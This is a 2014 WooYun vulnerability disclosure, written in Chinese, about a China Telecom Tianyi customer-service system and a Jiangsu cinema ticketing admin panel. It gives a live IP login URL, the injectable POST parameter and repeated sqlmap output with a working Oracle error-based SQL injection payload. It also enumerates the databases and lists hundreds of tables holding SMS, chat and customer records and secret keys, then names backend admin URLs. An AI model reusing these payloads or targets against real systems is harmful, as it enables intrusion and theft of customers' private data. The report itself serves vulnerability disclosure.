漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-082866
漏洞标题:天翼某漏洞导致客服系统+电影票系统沦陷(短信聊天记录都是浮云)
相关厂商:中国电信
漏洞作者: 爱上平顶山
提交时间:2014-11-11 14:37
修复时间:2014-12-26 14:38
公开时间:2014-12-26 14:38
漏洞类型:内容安全
危害等级:高
自评Rank:16
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-11: 细节已通知厂商并且等待厂商处理中
2014-11-14: 厂商已经确认,细节仅向厂商公开
2014-11-24: 细节向核心白帽子及相关领域专家公开
2014-12-04: 细节向普通白帽子公开
2014-12-14: 细节向实习白帽子公开
2014-12-26: 细节向公众公开
简要描述:
...
详细说明:
天翼
PS:标题是为安全考虑的~
一、注入:
http://116.228.55.189:8887/secs/loginAction.do?action=login
post注入: projectID=1&password=8&textfield3=1&projectID=0&username=8
ok 直接sqlmap神器:
sqlmap identified the following injection points with a total of 620 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: projectID=1&password=88&textfield3=88&projectID=0&username=8' AND 6968=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(110)||CHR(109)||CHR(116)||CHR(58)||(SELECT (CASE WHEN (6968=6968) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(105)||CHR(111)||CHR(110)||CHR(58)||CHR(62))) FROM DUAL) AND 'XtLx'='XtLx
Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: projectID=1&password=88&textfield3=88&projectID=0&username=8' AND 6968=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(110)||CHR(109)||CHR(116)||CHR(58)||(SELECT (CASE WHEN (6968=6968) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(105)||CHR(111)||CHR(110)||CHR(58)||CHR(62))) FROM DUAL) AND 'XtLx'='XtLx
Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
---
available databases [7]:
[*] EXFSYS
[*] MDSYS
[*] SYS
[*] SYSTEM
[*] TYKF
[*] TYKF2
[*] TYYY
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: projectID=1&password=88&textfield3=88&projectID=0&username=8' AND 6968=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(110)||CHR(109)||CHR(116)||CHR(58)||(SELECT (CASE WHEN (6968=6968) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(105)||CHR(111)||CHR(110)||CHR(58)||CHR(62))) FROM DUAL) AND 'XtLx'='XtLx
Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
---
current schema (equivalent to database on Oracle): 'TYKF'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: projectID=1&password=88&textfield3=88&projectID=0&username=8' AND 6968=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(110)||CHR(109)||CHR(116)||CHR(58)||(SELECT (CASE WHEN (6968=6968) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(105)||CHR(111)||CHR(110)||CHR(58)||CHR(62))) FROM DUAL) AND 'XtLx'='XtLx
Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
---
Database: TYKF
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| IM_MESSAGE | 9931099 |
| IVR_MIDD_OPER_LOG | 8547544 |
| T_BULLETIN_EVENT | 5740097 |
| IM_MESSAGE_HIST_2012 | 5305063 |
| T_AGENT_OPER_140929LOG | 4570329 |
| T_AGENT_OPER_LOG | 3874106 |
| IVR_AGENT_LOG_BAK | 2818190 |
| T_AGENT_CALL_LOG | 2220560 |
| CALL_WORK_ORDER | 1941486 |
| IVR_AGENT_OPER_LOG | 1832448 |
| IVR_AGENT_LOG | 1797055 |
| IM_SESSION | 1733133 |
| SMS_INFO | 1707157 |
| ORDER_OPERATION_TRACE_BAK | 1605809 |
| SMS_BACKUP_INFO | 1508287 |
| ORDER_OPERATION_TRACE | 1449987 |
| IVR_AGENT_OPER_LOG_BAK | 1286255 |
| CUSTOMERINFO | 1163802 |
| WORK_ORDER_BASE_BAK | 1101773 |
| T_AGENT_SATISFACTIONDEGREE | 1101131 |
| T_PRO_EXECUTE | 1057491 |
| WORK_ORDER_BASE | 1042241 |
| IVR_AGENT_OPER_LOG_20140903BAK | 946820 |
| IM_SESSION_20130523 | 880398 |
| WORK_ORDER_BASE_20130327 | 773390 |
| SMS_SATISFACTION | 752900 |
| IM_USER_ONLINE_LOG | 737112 |
| T_ROBOT_MESSAGE | 600510 |
| TEMP_ORDER_OPERATION_TRACE_BM | 566321 |
| T_ROBOT_SESSION | 428551 |
| WORK_ORDER_BASE_EXPAND | 425355 |
| UP_ORDER_DETAIL | 415991 |
| UNIFY_ORDER_EXPAND | 415987 |
| WORK_ORDER_BASE_JC | 403001 |
| UP_IVR_TRAN_DETAIL | 384118 |
| TEMP_WORK_ORDER_BASE | 383997 |
| T_REPOSITORY_LOG | 367722 |
| TEMP_WORK_ORDER_DEPT_BASE_BM | 364719 |
| IM_IP_INFO | 352969 |
| T_ACCESS_DETAIL | 340713 |
| TEST1 | 306989 |
| T_REPOSITORY_STATISTICS | 306670 |
| T_ORDER_DEAL_ONCE | 255148 |
| SYS_PDCACHE | 217517 |
| T_KHMOB_TEMP | 200000 |
| SYS_PAGEDETAIL | 176500 |
| SYS_PAGEDETAIL_20131011 | 174676 |
| T_AREA_PHONE | 172947 |
| SYS_PAGEDETAIL_20130813 | 170698 |
| SYS_PAGEDETAIL_20130730 | 168466 |
| IM_MESSAGE_TEMP_5553 | 167897 |
| SYS_PAGEDETAIL_20130709 | 167125 |
| SYS_PAGEDETAIL_20130618 | 166749 |
| SYS_PAGEDETAIL_20130523 | 164616 |
| SYS_PAGEDETAIL_20130516 | 163898 |
| SYS_PAGEDETAIL_20130425 | 162306 |
| SYS_PAGEDETAIL_20130402 | 161365 |
| SMS_GET_INFO | 144942 |
| SYS_PAGEDETAIL_20130318 | 136564 |
| SYS_PAGEDETAIL_20130117 | 134909 |
| SYS_PAGEDETAIL_20121019 | 130146 |
| SYS_PAGEDETAIL_2012_10_12 | 130119 |
| SYS_PAGEDETAIL_2012_09_21 | 129503 |
| SYS_PAGEDETAIL_20120914 | 129500 |
| TEMP_WORK_ORDER_BASE_YY | 128436 |
| ORDER_PROCESS | 125270 |
| T_HUNAN_TEL | 124727 |
| T_AGENT_MONITOR | 120033 |
| T_ORDERCONTENT_UPDATE_LOG | 114378 |
| SYS_PAGEDETAIL2012731 | 107813 |
| SMS_BUSY_INFO | 93678 |
| T_AGENT_SATISFACTIONDEGREE_BAK | 89221 |
| T_TEMP_PERSONAL_1217 | 76893 |
| T_SYS_OPER_LOG | 68177 |
| SMS_SEND_INFO_20130619 | 62758 |
| T_DAIL_OUT_OPER_LOG | 56465 |
| ORDER_TRUN | 52467 |
| T_MOBILE_H_CODE | 42226 |
| TEMP_ORDER_OPERATION_TRACE | 41733 |
| CL_TEMP_TIME_OUT | 41336 |
| T_SEARCH_KEY | 37236 |
| IM_COMMENT | 36473 |
| T_TEMP_QC_1307 | 35896 |
| T_BULLETIN_INFO_BAK | 24750 |
| T_TEMP_WG_1214 | 23780 |
| ORDER_AUDIT | 22945 |
| XC_TEMP_TIME_OUT | 20744 |
| T_FN_AGENT_QUERY_LOG | 20638 |
| T_FN_AGENT_CALL_OPER_LOG | 20300 |
| REPORT_SESSION | 20191 |
| T_TEMP_JY | 19626 |
| T_SUSPENSION_LOG | 16405 |
| TEMP_ORDER_OPERATION20131021 | 15928 |
| SYS_UPLOADINFO | 15828 |
| T_TEMP_BY_ZJ_121030 | 14917 |
| T_TEMP_BY_ZJ_20121030 | 14917 |
| IM_SESSION_TEMP_5553 | 14583 |
| UP_IVR_TRAN_DETAIL_BAK | 13805 |
| T_PRO_EXCEPTION | 13568 |
| TEMP_ORDER_OPERATION_TRACE_M | 12492 |
| SUM_T_AGENT_STATE | 11894 |
| T_SEND_MAIL_LOG | 11584 |
| WORK_HELP_QUALITATIVE | 11178 |
| T_TEMP_1222 | 10778 |
| T_TEMP_CP_1214 | 10540 |
| T_SYS_REMINDER | 10500 |
| T_TEMP_20121214 | 9104 |
| T_FN_QCJUHE_BAK_TEST | 8188 |
| SMS_SEND_INFO_20130702 | 7853 |
| SMS_SEND_INFO_BAK | 7003 |
| T_REPOSITORY | 6160 |
| T_REPOSITORY_20131231 | 6160 |
| T_TEMP_GRZH_1221 | 5927 |
| IVR_T_DTMF | 5865 |
| SUM_T_ALLCALL_CDR | 5865 |
| SUM_T_AGENT_CDR | 5365 |
| T_ACCESS_COUNT | 4819 |
| SUM_T_QUEUE_CDR | 4805 |
| T_TEMP_TEL1 | 4434 |
| TEMP_IM_SESSION_1 | 4390 |
| SMS_SEND_INFO_TEMP | 4288 |
| TEMP_IM_SESSION_2 | 4086 |
| SUM_T_REC_INFO | 4025 |
| SYS_CODE | 3097 |
| UPD_PWDRECORD | 3050 |
| T_SYS_USERQUEUE | 2861 |
| IM_USER_ONLINE_LOG_TEMP_5553 | 2739 |
| T_REPOSITORY_20131211 | 2647 |
| TEMP_IM_SESSION | 2416 |
| T_TEMP_TEL2 | 2400 |
| SMS_EXCEPTION_INFO | 2330 |
| T_TEL_CODE | 2319 |
| SYS_CODE_20130418 | 2222 |
| T_TEL_AREA | 2219 |
| T_TEMP_BEIJING_1218 | 2000 |
| T_PROVINCE_TEL4 | 1813 |
| SYS_CODE_20130117 | 1751 |
| T_REPOSITORY_FAVORITE | 1639 |
| T_FN_GRADE_ITEMS | 1529 |
| T_SYS_ROLERIGHT | 1453 |
| T_ORDER_DEAL_ONCE_EXCEPTION | 1451 |
| T_BULLETIN_DEPT | 1365 |
| TEMP_IM_SESSION_3 | 1330 |
| TEMP_ORDER_WORK_BASE_M | 1330 |
| T_FN_PROJECT | 1319 |
| SMS_SEND_INFO_20140424 | 1243 |
| IM_TERMINAL_COMMENT | 1240 |
| T_BULLETIN_BASE | 1233 |
| T_PROVINCE_TEL5 | 1225 |
| SUM_T_AGENT_ATTENDENCE | 1050 |
| T_DEPARTMENT_TYPE | 1001 |
| SYS_CODE2012731 | 898 |
| T_SYS_USERROLE | 770 |
| T_RELATIVE_SYS_USER | 604 |
| T_SYS_USER | 592 |
| T_SYS_USER_20130319 | 580 |
| T_SORT | 575 |
| T_SYS_USER_SHIXIAO | 520 |
| T_TEMP_BY_ZJ_20121107 | 504 |
| T_RED_CUST_LIST_TEMP | 470 |
| IM_COMMON_LANGUAGE | 463 |
| T_SYS_USER_20120719 | 436 |
| T_REPOSITORY_ANNEX | 404 |
| T_FN_QCJUHE_BAK | 359 |
| TREATMENT_GROUP | 343 |
| T_SYS_PERSONAL_SMS_20130228 | 340 |
| T_BUSS_DEFAULT_ORDERCONTENT | 320 |
| T_BUSS_DEFAULT_ORDERCONTENT_X | 310 |
| SYS_TABLEDETAIL | 300 |
| UP_IVR_TRAN_DETAIL_BACKUP_0606 | 285 |
| T_SYS_RIGHT_ACTION | 280 |
| T_SYS_PERSONAL_SMS | 273 |
| T_SYS_RIGHT_ACTION20140808 | 261 |
| T_BULLETIN_LOG | 252 |
| SYS_PAGE | 237 |
| SYS_PAGE_20131011 | 234 |
| SYS_PAGE_20130813 | 232 |
| T_FN_GRADE_IMITEMS | 231 |
| SYS_PAGE_20130730 | 228 |
| SYS_PAGE_20130709 | 223 |
| SYS_PAGE_20130618 | 222 |
| SYS_PAGE_20130523 | 216 |
| SYS_PAGE_20130516 | 214 |
| SYS_PAGE_20130425 | 213 |
| SYS_PAGE_20130402 | 211 |
| IM_SESSION_BAK_20121012 | 207 |
| SYS_PAGE_20130318 | 197 |
| SYS_PAGE_20130117 | 196 |
| T_TEMP_QC_COUNT | 193 |
| T_SYS_TYPE | 190 |
| SYS_PAGE_20121019 | 188 |
| SYS_PAGE_2012_10_12 | 188 |
| SYS_PAGE_20120914 | 187 |
| SYS_PAGE_2012_09_21 | 187 |
| T_SYS_RIGHT | 179 |
| SYS_PAGE_2012731 | 173 |
| T_SYS_RIGHT20140808 | 169 |
| SYS_PAGETOJSP | 167 |
| T_SYS_RIGHT_20120601 | 145 |
| EX_WORK_ORDER | 141 |
| SMS_WM_MOBILE | 140 |
| T_TEMP_ZJ_130708 | 130 |
| T_VERSION_UPDATE_INFO | 126 |
| T_BUSS_DEFAULT_ORDERCONTENT_B | 125 |
| T_FN_TASK_SEAT | 114 |
| T_IVR_USER | 95 |
| UNIFY_ORDER_EXPAND_CONFIG | 86 |
| T_REPORT_HOURS | 84 |
| T_SMS_TEMP | 84 |
| T_IVR_USER_TEMP | 76 |
| T_WORKORDER_TJFS_MX | 73 |
| T_24XS_DZB | 72 |
| TEMP_TIME_OUT | 65 |
| T_SYS_QUEUE | 61 |
| T_NUMBER | 60 |
| T_WORKPAPER | 59 |
| T_TEMP_1227 | 56 |
| UP_BANK_AUTH | 56 |
| T_TEMP_20130319_BY_ZJ | 52 |
| V_BST_TIME_PERIOD_HALF | 48 |
| T_FN_INFO_USER | 46 |
| T_IVR_ROLE_AUTHORITY | 46 |
| CTI_T_DEVICE | 45 |
| T_CFTSGD_BAK2 | 45 |
| T_FN_SHOW_ALARM | 44 |
| T_FN_TEMPLATE | 44 |
| T_DEPT_ORDER | 40 |
| TREATMENT_GROUP_BAK | 40 |
| SYS_TABLESEQS | 37 |
| T_SYS_ROLE | 37 |
| IM_SENSITIVE_WORDS | 36 |
| T_BULLETIN_INFO | 36 |
| SYS_TABLES | 34 |
| T_SYS_USER_20140716 | 34 |
| T_LOCAL_NAME | 32 |
| IVRPAY_RECORD | 31 |
| UP_RESPONSE_CODE | 30 |
| T_TEST | 27 |
| SMS_PHONE | 26 |
| SYS_FUNCTION | 25 |
| T_FN_GRADE | 25 |
| T_FN_TEACHER_TYPE | 25 |
| TMP_TIME | 24 |
| SYS_RF | 22 |
| UPDATE_PWD | 21 |
| T_CFTSGD_BAK | 18 |
| T_FN_GRADE_IMSESSION | 18 |
| T_FN_IMGRADE | 18 |
| IM_COMMON_TYPE | 17 |
| TMP_ORDER_STATUS | 17 |
| T_IVR_MENU | 16 |
| T_REPORT_SMS_SET | 16 |
| CTI_T_USR | 15 |
| CUSTOMERVIRTUALINFO | 15 |
| T_VOICE_QUEUEPARAM | 15 |
| T_BB_GDZT | 14 |
| IM_PARAMETER | 13 |
| ORDER_FEEDBACK | 13 |
| REPORT_T_AGENT_STATE | 13 |
| T_SYS_TEAM | 13 |
| T_REPORT_HOURS_BAK | 12 |
| T_REPOSITORY_CUSTYPE_CONFIG | 12 |
| T_MESSAGE_TEMPLATE | 10 |
| T_SYS_USE_DEL829 | 10 |
| IM_COMMON_LANGUAGE_TEMP_5553 | 9 |
| IVR_SDM_FLOW_CONFIG | 9 |
| T_FN_GRADE_BAK | 9 |
| T_PRESS_KEY | 9 |
| T_SYS_USER_EX | 9 |
| SYS_UPR | 8 |
| T_REPOSITORY_TYPE_DETAILS | 8 |
| T_ACCESS_COUNT_BAK | 7 |
| T_FN_TEMPLATE_QUEUE | 7 |
| T_WP_QUERY_ERROR_OR_NO_EXIST | 7 |
| T_YY_KEY_PARM | 7 |
| ORDER_VISIT | 6 |
| T_CONFIG | 6 |
| T_FN_GRADE_CALLLOG | 6 |
| T_FN_IS_QC | 6 |
| T_FN_TASK | 6 |
| T_STATUS | 6 |
| T_SYS_AREA | 6 |
| T_SYS_UQ_SMS | 6 |
| T_WORKORDER_TJFS | 6 |
| UP_COMM | 6 |
| IVR_AGENT_INTEGRATE_LOG | 5 |
| IVR_COMMONPAY_BINDUSER | 5 |
| SYS_ROLE | 5 |
| SYS_TABLEKEYS | 5 |
| SYS_USER | 5 |
| T_IVR_ROLE | 5 |
| UP_BUSS_FUNDINGSOURCE_CONFIG | 5 |
| REPORT_T_QUEUE_CDR | 4 |
| UP_COMM_20130421 | 4 |
| T_REPOSITORY_TYPE_LOG | 3 |
| T_SMS_MAX | 3 |
| CTI_T_COMPANY_SKILL | 2 |
| T_CFTSGD | 2 |
| T_LEVEL | 2 |
| BANK_AUTH | 1 |
| IVR_BLACK_LIST | 1 |
| SYS_CONFIG | 1 |
| SYS_PROJECT | 1 |
| SYS_VERSION | 1 |
| T_FN_GRADE_CALLLOG_BAK | 1 |
| T_ORDER_NOS | 1 |
| T_YY_REPORT_PARM | 1 |
| TORDERMAXCOUNT | 1 |
| UP_SECRET_KEY | 1 |
| UP_SECRET_KEY_BAK | 1 |
+--------------------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: projectID=1&password=88&textfield3=88&projectID=0&username=8' AND 6968=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(110)||CHR(109)||CHR(116)||CHR(58)||(SELECT (CASE WHEN (6968=6968) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(105)||CHR(111)||CHR(110)||CHR(58)||CHR(62))) FROM DUAL) AND 'XtLx'='XtLx
Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
---
Database: TYKF2
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| ORDER_OPERTION_TRACEE | 3065012 |
| WORK_ORDER_BASE | 2035562 |
| CUSTOMERINFO_INFO | 1596071 |
| WORK_PROCESS_TIME | 1415071 |
| SYS_UPLOADINFO | 21696 |
| SYS_CODE | 2075 |
| T_ADVERTISEMENT_INFO | 3 |
| T_ORDER_NOS | 1 |
+-----------------------+---------+
短信聊天记录、在线咨询记录都是浮云
二、后台
http://116.228.55.189:8887/secs/index.jsp
http://116.228.55.189:8887/blazerV4.3/index.jsp
三、院线
江苏院线通订票管理系统 地址:http://movie.js118114.com/adminax/Default.aspx
ok 不深入~
漏洞证明:
如上
修复方案:
...
版权声明:转载请注明来源 爱上平顶山@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2014-11-14 17:43
厂商回复:
最新状态:
暂无